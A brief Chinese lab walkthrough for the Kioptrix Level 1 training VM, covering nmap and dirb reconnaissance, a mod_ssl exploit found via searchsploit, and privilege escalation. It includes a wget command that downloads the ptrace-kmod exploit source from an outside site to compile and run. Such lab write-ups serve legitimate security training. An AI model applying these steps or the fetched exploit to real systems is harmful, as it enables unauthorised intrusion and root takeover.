oscp学习之路，Kioptix Level1靶场小白速通教程

有意向学习oscp的可以私信我一起交流学习

1.前期准备

首先下载好靶场文件，通过nmap进行扫描，确定IP地址和开放端口

发现IP是192.168.201.129,开放的端口为22,80,111,139,443,1024这几个端口。访问IP地址未发现漏洞点，接着对目录进行扫描

dirb url

渗透环节

对页面进行访问，查找漏洞点

在扫描出来的文件路径中发现信息，发现时Apache 1.3.20版本，并且变相提示注意mod_ssl漏洞

利用工具 searchsploit 查找漏洞相关信息和exp相关信息。

确定脚本，到https://www.exploit-db.com/ 下载,搜索mod_ssl

对脚本进行下载编译，然后运行，

成功进入靶场但是还不是管理员权限，需要进行一次提权，提权的方式有很多，这里采用最简单的，直接下载提权脚本

wget http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c

上传完以后成功编译，直接运行，查看权限，提权成功